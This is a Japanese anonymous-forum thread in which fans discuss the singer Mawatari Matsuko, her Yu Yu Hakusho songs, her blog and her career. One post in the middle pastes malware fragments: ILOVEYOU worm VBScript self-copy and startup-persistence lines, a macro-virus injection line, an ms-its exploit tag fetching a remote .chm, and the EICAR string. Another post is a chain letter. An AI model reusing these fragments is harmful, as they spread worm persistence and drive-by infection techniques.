【ディーバ】馬渡松子【健在】
馬渡松子 - OFFICIAL SITE - OPEN SALOON http://www.opensaloon.net/ 馬渡松子 New Album「POPS+」 2005年12月17日発売決定 !! 予約受付中 !! http://www.webworks-jp.com/MAWATARI/ 3ゲッツ! みんな思い出せ! 幽白の、ほら!あの人だよ! いやいや、ホームワークは終わらんよ。(すまん、無理あった) 確かに今の曲はセルフカバーの「微笑みの爆弾」しか聴いたことない アニソン歌ってる人のなかでも歌唱力は 上の方に位置するんじゃないか? この人のビブラートは好みだな 最初ドリカムかと思った。 そういや幽白の主題歌の人亡くなっちゃったね。ご冥福をお祈りします。 いたねー、こんな人。 ドリカムに関係していたような。。。 さよならbyebyeの 最初の「吹っ切るはずの」の部分は神だと思うが。。 >>18 高橋ひろだよね?御冥福をお祈り致します。 この人のCDはなぜか音が良い! 好きなアーティストがキングクリムゾンって・・・すごいね。 三股出身だっけ? 近くだにゃ。 幽白のCD借りてたくさん聴いたなぁ。 この人ドリカムのこと嫌いなの? HP見てなんかそう感じたのだけど 何かあった? >37 そうなの? 昔、ドリカムのバックコーラスやってたんだよね?この人。 作詞に小田佳奈子、牧穂エミ、松井五郎を向かえて欲しかった。 コエンマのデイドリームジェネレーションはネ申なり。 誰か〜Mステのデイドリームジェネレーションうpしてくださいませんか? デイドリームジェネレーションはよく聴いたなぁ・・・ メチャメチャ厳しい人がふいに見せた優しさのおかげで このスレがageられましたよ皆さん! 街の人ごみ肩がぶつかって独りぼっち→○ 果てない草原風がびゅびゅんと・・独りぼっち→△ 従業員150人の職場で独りぼっち→◎ サイトがリニューアルされる前に、バイオグラフィのページに 『口はわざわいの元…』とかって書いてたような気がするんだが、 '96〜'97年頃に何やらかしたんだ? 未だに仕事を干されて宮崎に帰った理由がよく分からんのだが。 メディアレモラス解散する時に何かあったの? 当時のコト詳しい人教えて下さいです… >>52 '96〜'97年よりは前だと思うけど ドリカムのバックやってたときは ソロになるのもあったのだろうが 中村さんと合わなかったという話は聞いたことがある 吉田さんにもあまり良い印象は持ってなかったとか・・ あくまで噂だけど・・ プロフィールでもドリカムのこと少々おちゃらけて書いているし (悪意があるのかないのかは別として) 帰郷したのは病気のためとかってあったけど・・ 芯が強そうで裏表がなさそうだから ぶつかりやすいかもしれないよね そういうところ好きなんだけどね 的確な答えじゃなくてごめんね >>53 さん ありがとう!+亀レススマソ。 そうだそうだ「病気した」ってのをすっかり忘れてました。 この人昔ラジオで、自分のパイオツ吸った事あるって言ってた >>38 ドリカムのring ring ring だっけか? にコーラス参加してたはず。 自分は、題名うろ覚えだから違うかもしれないけど、 フォーチュンテラーって曲が好きだったぞ。 ♪Mrフォーチュンテラーこの先どうなるの? ってやつ 知ってる人いるかしら? >>58 ノシ あ・い・た・し・が・く・な・り・が・た・し! "君は今心臓破り"を聞くと90年代前半を思い出して涙がちょちょぎれます^^ <body onload=window()> If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" ; type="text/ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\" If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) >そういえば、この間、なにげなく前にやった代々木のライブパンフを見てたら、 >代表の白川さんって馬渡松子さんに詞を提供していたリーシャウロンっていう人だったのね。 >うわっ、そんな有名人に声かけられてしまったんだ、極楽(CONY)ってスゲェー。 某ブログより。 有名人なんだね。 最近友達がカラオケで幽遊白書の「微笑みの爆弾」歌って、いい曲だな〜と思って、ネットで幽白の曲拾って聞き始めた。 ハマった。女だが歌声に恋した。 この人の事全然知らなくて、ググッたら最近の写真見つけたけど…orz 微笑みの爆弾は神すぎる。当時は消防でわかんなかったけど。 上のMステ、やっぱり声素敵ダナ〜。 さよならbeybeyは神曲 ツタヤで幽吐くのアルバム借り手きたお( ^ω^) 馬渡さん懐かしい。 大好きだったなぁ。 1stアルバムは全部良かった。また聞きたい〜。 昔、テレビで2・3回歌ってるところを見たけど すごかったなぁ。 踊りが!!!! 何かいっちゃってそうなすごく変な踊りをしていて 突然カメラに突っ込んじゃったり お客は完全にひいてたけど そんな松子ネエが好きさ。 ここは誰もいないなぁ。 馬渡さんってあんまり有名じゃないのかな。 "知らん顔" が関東ローカル局群(千葉、埼玉、神奈川)同時放映の『ハマランチョ』って番組で使われてる!! 今幽遊白書の再放送やってるけど、この人の声いいね☆ YouTubeのMステ動画消えてる・・・。 どなたか動画お持ちの方、アップして頂けないでしょうか。 昨日の堂本兄弟でさよならByebyeがランクインしてた 目を開ーけてー見る夢ーならー 今はー傷ついてもいいー この人のスレがあったんだ。 つい最近、幽白のアルバム借りてきたがやっぱりいい歌だ(`・ω・´) ホームワーク〜の歌の途中にあるラップ?には「え?」ってなったが。 幽白のCDは毎日のように聴いてる。 ホームワーク〜の前奏がかっこいい! カラオケで歌ったら、すぐ友達にトイレに立たれたけど 神だなんて…好きになるにも程がありますよ! 蒼い〜夜明けの歩道〜 ってかバラブシュカ以前のアルバムって廃盤なんだ・・・ 一枚目以外は持ってるんだけどね 個人的には三枚目が好き 最近思い出してよく聴いてる それにしても良い声だな もう一花、いや二花も三花も咲かせてくれ >>113 3枚めはほんわかした曲が多くて良いやね さよならByeByeは俺の中で神いわゆるゴッドな曲に認定された これはアメリカのゲームです。1度やってみてください。 これは、たった3分でできるゲームです。試してみてください。 驚く結果をご覧いただけます。 このゲームを考えた本人は、メールを読んでからたった10分で願い事が かなったそうです。このゲームは、おもしろく、かつ、あっと驚く結果を 貴方にもたらすでしょう。 約束してください。絶対に先を読まず、1行ずつ進む事。 たった3分ですから、ためす価値ありです。 まず、ペンと、紙をご用意下さい。 先を読むと、願い事が叶わなくなります。 @まず、1番から、11番まで、縦に数字を書いてください。 A1番と2番の横に好きな3〜7の数字をそれぞれお書き下さい。 B3番と7番の横に知っている人の名前をお書き下さい。(必ず、興味の ある性別名前を書く事。男なら女の人、女なら男の人、ゲイなら同姓の名 前をかく) 必ず、1行ずつ進んでください。先を読むと、なにもかもなくなります。 C4,5,6番の横それぞれに、自分の知っている人の名前をお書き下さ い。これは、家族の人でも知り合いや、友人、誰でも結構です。 まだ、先を見てはいけませんよ!! D8、9、10、11番の横に、歌のタイトルをお書き下さい。 E最後にお願い事をして下さい。さて、ゲームの解説です。 1)このゲームの事を、2番に書いた数字の人に伝えて下さい。 2)3番に書いた人は貴方の愛する人です。 3)7番に書いた人は、好きだけれど叶わぬ恋の相手です。 4)4番に書いた人は、貴方がとても大切に思う人です。 5)5番に書いた人は、貴方の事をとても良く理解してくれる相手です。 6)6番に書いた人は、貴方に幸運をもたらしてくれる人です。 7)8番に書いた歌は、3番に書いた人を表す歌。 8)9番に書いた歌は、7番に書いた人を表す歌。 9)10番に書いた歌は、貴方の心の中を表す歌。 10)そして、11番に書いた歌は、貴方の人生を表す歌です。 この書き込みを読んでから、1時間以内に10個の掲示板にこの書き込みをコピーして貼って下さい。そうすれば、あなたの願い事は叶うでしょう。もし、貼らなければ、願い事を逆のことが起こるでしょう。とても奇妙ですが当たってませんか? ナツカシス 渋谷Take off7でのライブが・・・ ソロデビュー前だったよな。 あの頃から歌唱力は抜群だった。 そのライブのMCでDCTのTV出演でコーラスやった時に、 今回はすげ〜写ってるう〜!って、はしゃいでました・・・ 俺を含めて客はほとんど引いてたけどね・・・あのテンションに・・・ 真のディーバと呼んでもいいのは、Minnieかこの人ぐらいだろう。 ゲッゲロゲ〜〜〜〜 コケコッコ〜〜〜 コケ〜〜〜 ゲッゲロゲ〜〜〜〜 コケコッコ〜〜〜 コケ〜〜〜 コケコッコ〜〜〜〜〜 >>139 ね。読者にいったい何を訴えているのか…。 俺もブログ見てきたが、確かに病んでるな…。 つーかベストアルバムが出るらしいじゃないか。 しかし数年前にセルフカバーされた微笑みの爆弾の 出来を考えると、少々不安…。 この人たしか幽白のことをあまりよく思ってないんだよな 桑原の姉貴が歌ってるのを想像してしまう 良い声だよな〜 20代でストイックに音楽つきつめてポップスとのせめぎあいして自由に生きてきたんだよ あの音楽性でjames brawnのバンド組むなんてかなりやるわ ようつべでMステに出た時の馬渡の動画ウォークマンで落とせる? 今、ベストアルバムの試聴を聞いてきたんだが… 歌唱力落ちてる…? というか、音程が外れてるように聞こえる箇所がいくつもあるんだけど これはアコースティックverだからなんだろうか 今でも幽遊白書のCD聞くけど、昔の方が全然良いじゃねーかYO! なんか…自分もブログ見て「どうしたんだこの人…!」ってちとびっくりした ブログ持ってるなんて知らなくて、最近初めて行ったんだが、 これ全然自分がミュージシャンだと自覚してる人間の書く文章じゃねーぞ! そんなに周囲からの目がないと思っているんだろうか こういう歌とか、自分そのものを売りにして生きる商売ってのは 普段の本人の素行なんかも、絶対気を付けなきゃいけないと思うんだよ どうしたんだ松子…! なんか「看板が無くて引き返せない」の所ですごく心配になった… おま…もう自分の意志で引き返しちゃえばいいじゃねーか! ギャグととれず、本気で大丈夫なのかと心配になるブログだよな… とても好きなアーティストなんだが ブログ読んでるとどうしたもんかと >155 鍛え直せばまだまだいける と思うのは贔屓の引き倒しなんだろうな…… この人ブログに度々「私は業界から干されて〜」とか書いてるけど何があったんだろう?あまり売れなくて契約切られただけじゃないのかなあ? もうちょいストイックに頑張って欲しいな 老け込むにはまだ早いよ松子さん 喉大切にしてダイエットすりゃあの美声も復活するだろうに…勿体無い タバコで咳き込みだしたらもう断煙しなきゃ 体調についても酒やめなきゃ このままだと本当に歌えなくなるよ 日本に数少ない本物の実力者なんだから、 体も才能も大事にしてほしいと切に願っている 人生色々あると思うけど、この方いつからこんな感じなんだろうか… ネガティブな事ばかり口にしてると、益々自己暗示でネガティブに行ってしまうし その辺はマインドコントロールする努力くらいするべきだと思うけどなぁ 音楽以前の問題で。 このブログ読んだら(例えば仕事関係の人とか)、 とても馬渡さんを大人として扱ってくれるとは思えないんだが。 コメントを付けてるファンの人らは優しいから暖かい言葉をかけてるけど それに甘えてないか?? 周りが自分の都合の良いように合わせてくれるなんて思ったら大間違いだぞ。 誰だって嫌な事なんて山ほどあるのに名前のせいにするなよと。 全国の松子さんに失礼すぎる。 曲はすごく好きなんだけどさ… マワさん最強!マワさん最高! 昼さが〜り〜渡り廊下〜すれ違う度〜 さよならbyebyeと デイドリームジェネレーション 好き過ぎて今でもiPodに入れて聞いてる自分は幽白世代です。 過疎ってるなぁ…。 自分も幽白でハマって松子さんのアルバム全部揃えた。 今でもケータイに落として聞いてるよ。 パンチのある歌声だったんだけどなぁ…。 おいおい、この人まだ40代じゃないか。 67年生まれの声優っていったら今もまだ大活躍してる。馬渡さんは歌手だけど… 頑張ってほしい。馬渡さんの歌声大好きだよ たまにブログにコメ書いてるけど片思い的気分になる… ライブできない程体調悪いんですかね? >>171 馬渡の大ファンで大好きだから敢えて言わせてもらう。 この人の今の外見は化け物。クリーチャー。 全盛期ですら容姿はよくないのに、自己管理(喉も含む)を怠ればなおの事。 ライブなんかできるわきゃない。 ラジオでアルバム製作中と言ってたよ。期待しよう! そんなに酷いん? 確かに幽白のセルフカバー聞いた時は驚いたが昔のアルバム聞いたら すごい人なんだと実感したよ。素晴らしい曲ばかりで 廃盤になってるけどオクで落として聴くの楽しみだ 松子さん頑張れ〜 ルックスは関係ないな またいいアルバム出るよう期待するわ 酷いというほどでもない。歳相応よりちょっと老けた普通のおばさんって感じ。 ブログに書いてあるド○○○にワロタw なにゆえ伏字?w >>174 同意。 しかし外見から推察される本人の自己管理状況というものがありまして。 ストイックに生きて欲しい。 二流の表現者いたいと思うなら尚のこと。存在がダレてるとファンとして寂しい。 >>178 たしかにw 私はド〇〇〇嫌いだからコメで突っ込もうかと思ったw ド〇〇〇のバック出身で売れた人いるの? なぜか松子さんの外見が静流さんで脳内再生されるんだが。 理由わかる人いる? >>162 答えはリーシャウロン氏が開いているホームページ内コラムの タイトル「圧力」を読めば解る! >>181 声がなんとなく似てるからじゃないかな? 静流さんが歌ったらこんな感じだと思う 幽遊白書がきっかけで好きになった歌手だけど、 本人がそのことをあまりよろしくなく思ってるようで驚いた 今ではアニメの主題歌やEDを一般歌手が歌うなんて当たり前で アニメをきっかけにブレイクする歌手も出てきたけど 当時としてはアニソンを歌うというのは喜ばしいことではなかったのかなぁ… >>186 ブログには今は感謝しているようなことは、これまで何度も書かれている。 歌手ではなくアーティストになりたくてプロになったのに、 アニソンを歌うとそこに限定されてしまうイメージが付く懸念ぐらい、 計算できない人じゃないよ。 漫画は好きで、幽白のコミックも買ってたそうだし。 わざとらしい問題提起にしか見えない。 ____ /__.))ノヽ .|ミ.l _ ._ i.) (^'ミ/.´・ .〈・ リ .しi r、_) | 馬渡はわしが育てた | `ニニ' / ノ `ー―i´ 馬渡さんのボーカルは神 うまいとかじゃなくて色々なセンス 物まねしても到達できない リーシャウロン氏のブログは素晴らしい リー氏がいなかったらあれほどメジャーで活動できたかと思う >>187 すげー このカキコがわざとらしい問題提起にしか見えないて、どんだけ卑屈なんだw むしろ187の主張の方がわざとらしく松子の良いところだけピックアップした文章に見えるが >>186 つくづくわざとらしいな 何回その話題を出すんだよw 歌手とアーティストの違いもわかんないんだな 再録バージョンの微笑みの爆弾、 見事にサビが「ねっちゃねちゃー」になってるよな。 久しぶりに来ましたが…なんだか一部の方に不快な思いをさせたようで申し訳ないです わざと問題提起しようとしたとか、そんなのではなかったのですが 今までの書き込みや前スレを読んでなかったのも悪かったと思います。 幽遊白書の微笑みの爆弾が好きで、今でもちょくちょく聴いてます 再録バージョンが気になるので、今度聴いてみます〜 数少ないファンがファンを蹴落とすようなマネして何がしたいんだ レコード会社って横沢がつぶしたんだよね 鈴木結女とか本当は歌手つづけたかったのかな? 今かつてのライヴ映像を自由に公開してるのは リーシャウロンさんだけなん? 今の馬渡氏の生活に不満はないが、過去の名作が埋もれるのは悲しい… 再発は無理なのか? ブログにはダンナが側にいるのを匂わしてたけど妄想? >>204 鈴木結女は結婚して米国に行ったから、 活動やめちゃったみたいだけど、いまは日本にいる。 彼女は都心の一等地に事務所あったけど、 急に板橋へ事務所移転してから活動が怪しくなった。 結婚も急な話で、FC解散で会費返金の権利あったのに もらえなかったな。 松子姉御もデビューから好きで、CD全部保管中 メジャーだろうがインディーズだろうが生徒一人相手だろうが フィルターは関係なくずっと音楽つくってるみたい すぐに活動を政まつりごとに結びつけて 本人もファンもこうでなきゃと 筋をはきちがえたミュジシャンがいる中で あるいみ本物の音楽家といえる インストアルバムって出来はいいの? 数少ない馬渡ファンも持ってないし 試聴も出来んし インスト自体は好きなんだが プラネタリウムのオファーで作ったインスト今でもたまに好きで聞く 馬渡さんは楽曲の強烈なファンがいまだ全国にいるから やらないだけの話でもしライブ組んで告知したら 大きなハコは無理でも2DAYSは軽いんじゃなか? ファンもインスト持ってないって何を根拠に断言してんだよ 諸々のHPやブログの様子で決めつける頭しかないネット厨が 自分の腕はどうなんだ 「数少ないファン」ってのが気にさわったなら反撃 ファンがいるならなぜ事務所クビになるんだよ 馬渡氏もブログに事務所の人に世話になった等々書いてた事あるか? 病気は理由にされちゃうかも知れんが でも事務所の人も冷たくあしらったんだろ クビになった云々を鵜呑みにしてるのか 情報入手はやはりブログだけなんだなネット厨 事務所は移籍レーベルを用意していた どんなアーティストでも次はどうしていくかを常に考える アットホームで有名な事務所だよ 商業的に売れることが必ずしもいいとは思ってなかった音楽への取り組み方と 意識のズレがあったので馬渡氏が独自で活動する決意をし 事務所もそれを了承したのがシステム上の流れだよ そんなのが気にさわるというより アルバム一枚さえきいたことのないファンでもない無知人間が こんなところにわざわざネガティブ操作をしにくるバカさ加減にあきれるよ そんなことする暇あるなら己の弦の甘さを反省しろ >>218 同意 妄想ネットチュウは論点をすりかえたりで 他人をおとしめることに燃えてるだけってのがわかるな チセエ こんなに業界に無知なやつも珍しいわwww ヒーヒーいいながら一回こっきりのワンマンやるぐらいなら 余裕かましてやらない美学のがよっぽど神懸かって印象強いわwwwwwwwwwww なぜかよく分からん流れになってるね ライブハウス行きまくりだったファンの事も 叩く奴等しか残っておらんとは… 他のアーのファンはもっと優しいし、ましてや活動休止なら団結するよ 色々神経をうたがう… はいはいアルバム6タイトル所有の新参者は消えま〜す ふぁんなんかゼロでも音楽やっている人は山ほどいるのに ふぁんや事務所をかならず結びつけて連呼・・・ちょっと異常 そんな次元から入るって ねっとちゅうさんはちっちゃな事務所にかかわってる人かなんか? インターネット止まりの 団結ってwwwどこまで政治癖なの 音楽の楽しみ方なんて個人個人自由なのに 動きばっか詮索するきつい性格のもんのために馬渡さんは音楽やってないよ 消えてくれてふぁんも助かる〜 ネット鼠はキャラ立ち先行の意識があるからじゃない? 馬渡さんはキャラも面白いけど いまは作り出した音楽そのもののファンが占める 部屋で聴いたり個人で楽しむから情報表面上には浮かびづらい あ わかった 音楽にはライブファンだけじゃなく 音源のみのファンもいるちゅうことが理解できないんだ 知ったかネガティブ操作でイメージダウンを図って 結局ファンを叩いてんのは自分自身ということまで揉み消すとは・・・ この場所で「復帰してして」言うつもりもないし意味もないだろうけど 馬渡松子の何かに関心持って書いてるんでしょ 憶測でも事実のおさらいでも別にいいが罵りあうのは寂しくないか… MSの事はナガマリやドリカムとかに絡んで 言いつくされているんだけどねぇ… 女性歌手は長く活動している方は事務所を かなり移動しているほうが多いんだよ。 MSも昔は小さく、小回り効く範囲で営業していたのが ナガマリやドリカムの人気が大きく成り過ぎて 他の歌手まで手がまわらなくなって、ドリカムを 外へ出して分離独立させたし、ナガマリは無謀な結婚で 人気落ちて、切れる時に切った。 それでまた、適性規模の事務所に戻ったワケだが。 松子姫の場合はCD出す会社がきちんと宣伝出来なかったから いい歌書いて歌っても売れなかった…と言うか「販売力」に 問題あるレーベルと組まされたのが不運だったと思う。 鈴木結女も同様だけど、アレもテイチクに移ってからは 新譜が全くCD店に入らなかったな。V-Japan→メディアレモラス組は 全員その後も悲惨だった。 純粋に曲が好きな者にとっては 数少ないファンと強調されたり憶測でクビと決めつけたり 事務所にあしらわれたんだろ なんてマイナスのよけいな言葉は 皆いい気がしないことはたしかだし それを排除しようとするのは悪いことじゃなかろう そもそも人の不幸は蜜の味みたいな人間は 実際都合が悪くなったら話そらしてるし まともなディベートなんて成り立たないよ >販売力に問題あるレーベルと組まされたのが不運 まさにその通りだが 馬渡姫にかぎっては悲惨というより どのような組まされ方をしても 自ら壊して同じ道をたどったかもね 根底にはどろどろパンクの血が流れてるし 売れるほどダサいことはないって爆弾発言してたしw 極論だし深い意味もあるんだろうけど 意識レベルの高いインデーズバンドの連中なんかは この言葉の真意が理解できるかもしれん レーベルがいいと思う基準と馬渡姫がいいと思う基準に みぞがあったのはたしかだね ちゃんと給料もらえるようなメジャーデビューしただけでも凄いことですよ。 出るのが難しいMステもMSの力で出れました。 業界は色んなことがあるから経緯も色々すぎて、 内部の話はもう興醒めしがちだけど、 バラブシュカや甘ちゃんが懐かしいから、たしかにここにいる。 いいことですよ。もうそれで十分じゃ・・・ もう何年も経ってる。15年以上? それだけ経ってまだ話してる。これ凄いです。 馬渡さんは今はもうずっと個人で温和な生活送ってるのに、 ファンが団結だの、事務所がどうの、どうでもいいことに思えますが。 どれだけクオリティの高い曲を残したくれたかという。 爆発的に売れなかったほうが馬渡さんらしくてかっこいい。 少なくても、この世に生まれてこの才能に巡り合えた人は、 皆感謝してます。 公演を全くやらなくても、CDをお約束のペースで 出さなくても、聞いた人、見た人、それぞれの記憶に 残る存在であるから、それで十分じゃないかな… 業界には「1発屋」という、1曲のヒットのみで 次のヒットを出せるはずと思って「ドサ回り」で 生きている歌手も多数いる。ある歌手はそのヒット曲の カバーが多数あるけど、自分の書いた曲でないから、 印税は入ってこないのだが、しぶとく生きている。 松子姫が損しているのは、その点だな。 他人がカバーする曲がない… そのとおり ん? 微笑みの爆弾は無名も含めてかれこれ10人ぐらいにカバーされてるよ? しょこたんはオムニバスの中で歌ったけど そのアルバムがオリコントップ10入りしてたらしいし あと海外でもアニメの幽遊白書が始まって 馬渡姫の書いたOPEDが4曲まるまる放映されてきた ブラジル、アルゼンチン、フィリピン、アメリカ、次はフランスとからしい 損どころか・・・20年近く経つのに馬渡姫はこの印税だけでも 莫大ではないとも思うが普通に生活できるだけの額が 相変わらず入ってきてる アニソンのカラオケファンもやたら根強いからね 流行歌の大ヒット曲でも2、3年もしたら印税は0に近づくから それを考えたらそうやって途切れずに何年も続くほうがよほどおいしい さらに他の仕事も地元でやってるようだが なんせ酒代が莫大のような気がw 豪勢じゃなくても一応印税生活できるってことは さまざまなんらかの形で使用するのに必要とされてるってことだから それだけ支持するユーザーもどこかで生まれてるってことだよね やぱライブだけのことでファンを語るのはまちがいだ 自分もかなり年だけど 残念ながらジジババどもにはかなわんわ っつーか最近急に湧いてきたよね 2ちゃんにファンブログな文章書く皆さんw あ〜時間のある方はWikipediaの馬渡松子の項目を充実させてください 「多数」のファンやコミュでお願いしてもやってくださらないもので 馬渡さんは知らないところですごいんだなあ そりゃ中途半端ガキがかなうわけないがなwww デリカシーの文字さえ辞書にないわな 2チャンファンはwikiアカウント作って自分でやれってお願いしてもご無理なもので あ〜社会性のある方は本人に直接コンタクトしてみてください 「1人」のキッドがだだこねてるもので >>212 バラブシュカの中では womanwomanとバースデーがのしかかるのベースがやたらめったらかっこいと思う これも本人でアレンジしたとは むなしく叫んでも顔見るには地元付近にいくしかないもんな・・・ しかも何年も前から歌ってほしいってみんないってるけど 今後も変化なしにそろそろきづかないと なぜ干されたと言ってて引退宣言せんのだ あのブログは仲間へのメール変わりか? デビュー当時からのキャッチフレーズ「うそつき松子」 やったね! ^^; 声が太くてパンチはある、キレイなビブラートの歌手 程度の認識だな。 パンチ死語、ビブラートふるっw 昭和歌謡教室程度の目線だな レーベルって宣伝へったくそだったよなー バブル期だからシングル売り上げ命みたいな商売レベルで 勉強不足なんがしろうと目にもわかったわw >>241 売れなきゃ販促費が積めないのに、 宣伝出すところが場違いだったりで… デイドリームジェネレーション! しょこたんがカバーするとまた盛り上がる ____ /__.))ノヽ .|ミ.l _ ._ i.) (^'ミ/.´・ .〈・ リ .しi r、_) | さよならbyebyeもわしが育てた | `ニニ' / ノ `ー―i´ >>249 それみたい!! もっと評価されるべき歌手だろこの人・・・ >>245 絶対やめてほしい 川本真琴の1/2やったのもうざかったわ ファンからするとカバーとかしていらない アニメ4曲ファンとアルバム40曲ファンに分かれるからなあ 深く知ってるアルバムファンからすれば どうぞご自由にって感じ >>252 へー アルバムファンなんているんだー アニメ以外の曲は全部同じに聴こえる 頭に残らないメロディー 歌詞もダサい やっぱ声が良くて歌唱力あっても曲がダメだと売れないよねー アルバムファンてほどじゃないが 君は今心臓破りとかナイスアンバランスとか好きだな 松任谷由実のファンて、だいたい40歳くらいからが多いでしょ? てかアニメ4曲しか知らないとかアルバムファンとか区分けせんでも。 沢山知ってる自分すごい、アニメ4曲しか知らない人はにわか、 みたいな空気放たれるとイヤンな感じだわ 1曲でも好きな曲があるからここに来てるのにさ カバーして欲しいして欲しくないは単なる個人の感覚の差だと思う… >>253 www叩きたいだけの奴ってムキになるだけだから説得力ねえなあ てめえは誰を認めてるのか聞いてみたいよ いえないだろw 四曲ともアルバムに含まれてんのにさwあるばむふぁんて思う人は ひっくるめて好きに決まってるやんけ どうぞご自由にって大らかで区分けしてないイイかんじ 作る人って他の人にも歌われるのは栄誉だし、 うれしくない人なんていないんじゃないか? そこをすなおに共によろこべないで カバーする者をけなし、作品をけなし、作曲、作詞家までけなし、 断固拒否してる自分はすごいって。思い切り区分けでイヤンなかんじ、、、 どこがファンやねんw音楽きらいなんか? 以外ぜんぶ同じに聞こえる、売れないとか どんだけ重症ひきこもりオタで商業至上主義で音楽のセンスないんだよ >>258 間違いない アルバムはただ世に浸透してないだけ、微笑みの爆弾以外の三曲は幽白を考えて作ったわけじゃないからその四曲だけ良いってのはあきらかにおかしい話。 他の曲も幽白で使われてたら絶対ヒットしただろうなって曲もいくつかあるし。 だからその4曲ファンかアルバムファンとかで区別する意味はわからん。 アニメで好きになったからその4曲が好きってファンは多いだろうけどそれはアルバムをしらないだけでアルバムは嫌いってわけじゃないだろ。 てか売れてる曲が良い訳じゃない とりあえず馬渡松子の復活を願いたいね。 ブログでみるかぎりじゃ地元でちょこちょこやってるみたいだけど もったいないなぁ >>256 の言うとおりだと思う >>252 みたいな人ははっきり言って人としてどうかと思う >>258 は的外れすぎてかわいそうだとは思う >>253 自分に自信がない人間ほど物事を批判することでしか 己の存在価値を見出せないという定説を証明したかったのですねわかります 260 そんなことより馬渡姫の話しよぜ! 今日もデイドリームジェネレーション聴く俺 馬渡中毒者はこの時代もういないのか? >>260 他の歌手をここでなじるなんてのが一番的外れということに気づかないのはみじめだな ところであんた、誰のファンなの? >>262 おーきもちいいねー馬渡中毒とは笑 おれはデイドリームも好きだけどホームワークもやっぱリピートする アルバム持ってないけど被害妄想とかやっかみはないな、 ニコニコでGLASSICAって曲きいてぶっとんでから何度かききにいってる こころのままにもこころにのこるるるるw やっぱさぁ、復活は本人の気持ち次第だよね 先日亡くなった、元TV制作者の横沢さんはメディアレモラスレーベルの 発足に絡んだ1人でしたね… V−ジャパンが洋楽部分は東芝EMIに移動して、国内はEPOだけが 東芝EMI移籍だったな。あとは全部メディアレモラスが引き取った。 >>262 デイドリームジェネレーションの歌詞いいよなー グラシカの歌詞もテラかっけー 基、ZIPなんかも メロディも好きだ 馬渡ファンだぜ!自分に自信ある >>264 皆が想像するようなはなばなしい復活はむずいんじゃないかな 精神的環境的にも本人一人の力じゃさ 誰か強力な仕掛け人が現れないと・・・ >>267 お前、最高にスカだよ ベストアルバム聴いたら声が別人みたいになってるな。 おいなんだよこのスレ・・・。気持ち悪いくらいのマンセーカキコしてるのは一人だけだし、 否定レスに対してもいちいちファビョってるのはそいつだけじゃねえか。 メール欄がたまに全角になってるぞ。 >>268 のおっさん、あんたのことだよ。工作員乙。 なんかここ、論破できなければ罵声に走る〜 みたいなおこちゃま雑魚がべたついてますね。 まともな内容の論議は苦手そう。 当時はライヴビデオとかプロモとかの販売はなかったのかしらぁ? 復活?ライヴやって欲しいケド、無理ならせめて昔の映像がみたいと思い… 昔からファンで詳しい人教えて下さい。 ワザワザ重厚なはなししてくれるおじさん達けとばしたらほとんどアンチスレ むきにネト用語全開でどや顔工作なんてちっせえ いちいち毒はくなよな... ちょ、218と219なんてもろ自演wwwこんな馬鹿ひっさびさに見たわwwwww つーか誰か気付けよwww でもこんな過疎スレで自演なんて一体誰が得すんの? 基本的には昔の人だし、自演するほどの狂信者はさすがにいないんじゃ まさか本人?そんな感じはしないけどなぁ >>273 お前はいいかげんこのスレから出てったほうがいいと思う 話がめちゃくちゃだな笑 とりあえずこのまま馬渡松子って名前だけが一人歩きしちゃって可愛そうだ 微笑みの爆弾はまたカバーされるみたいだけど 個人的には他の曲も是非もう一度世に出回ってほしいなぁ これまでの流れを読んでみて思ったのだけれど、 自演をしていたのは作詞の人ではないかと思った てか普通に考えたら自演しても本人らになんのメリットもないからしないんじゃないかな・・・ アイドルじゃないんだからおばさんだろうが若かろうが関係ないよーな 歌だろ歌 当時のライブの話とか聞きたいです。だれかリアルタイムで見てた人いるのでしょうか? 馬渡松子がアニフェスに出演! やばいだろ、、 いくしかない 凄い好みの声。 90'sのポワンポワンした切ない音楽にぴったりだと思う。 >>286 行ったよ。 まだ大阪が終わったばっかで、今書くとネタバレになりそうだな。 ……それ以前に書いていいものか迷うネタが。正直誰か書いてるかなーと思ってたんだけど。 問題ないなら詳細めいたことを書くけど。どうしようか? かなりきついよ? 正直俺は引いたからねー。 ここで書いちゃうとGoogle様にも捕捉されるから本人サイドの目に触れるかもしれんし。 1個だけ。 「なんか呼び方を決めようか?」とMCが話を振って、何故かそれが「マツコ」と。 場内から一斉にマツココールw 演奏はどうだった?もはや歌には期待してないので 演奏陣が良ければ(原曲に忠実とかアレンジでもクオリティ高いとか)行ってみようかなと迷ってる >>291 >演奏はどうだった? >演奏陣が良ければ(原曲に忠実とかアレンジでもクオリティ高いとか)行ってみようかなと迷ってる それに関しては良くも悪くもアニソンイベントであるとしか。 アレンジとかしようものならみんな大暴れ。途中のリードギターのソロ以外は一音も逃さず原曲通りだと思う。 ただ演奏の質とか分かんないわ。バンドというかスタジオミュージシャンを連れてきましたみたいなもんじゃねーかなー? >>292 ありがとうございます! ライブで完コピか… アニメのイベントならではなのかな。 松子さんいろいろあったんですね。 そいじゃ、覚えてる限りで書いてみるか。 読みたくない人は透明あぼーん推奨。それと抜けてるところも多々あるのでそこんとこよろしく。 最初に司会MCが「初登場の幽遊白書でお馴染み、馬渡松子さんです!」と紹介。会場盛り上がる。 「微笑みの爆弾です!」と紹介と同時にイントロ。そして馬渡松子さんステージに。 ものっそい畏まったお辞儀。そして歌い出す。 ほぼ変わらない歌声に会場もヒートアップ。「どっちだろー!」は会場全員が自然と合唱w 1コーラスも「アリガトゴザイマス!」でしっかり締め。ここまでは良かった。 また縮こまったお辞儀。 2コーラス入ったところから様子が変わる。もう嗚咽が止まらないみたいで「ひとりーぼっちー」すらかすれてる。二回目の「どっちだろー!」は全然出ない。会場も変な空気になる。喉をやっちゃったみたいな声。 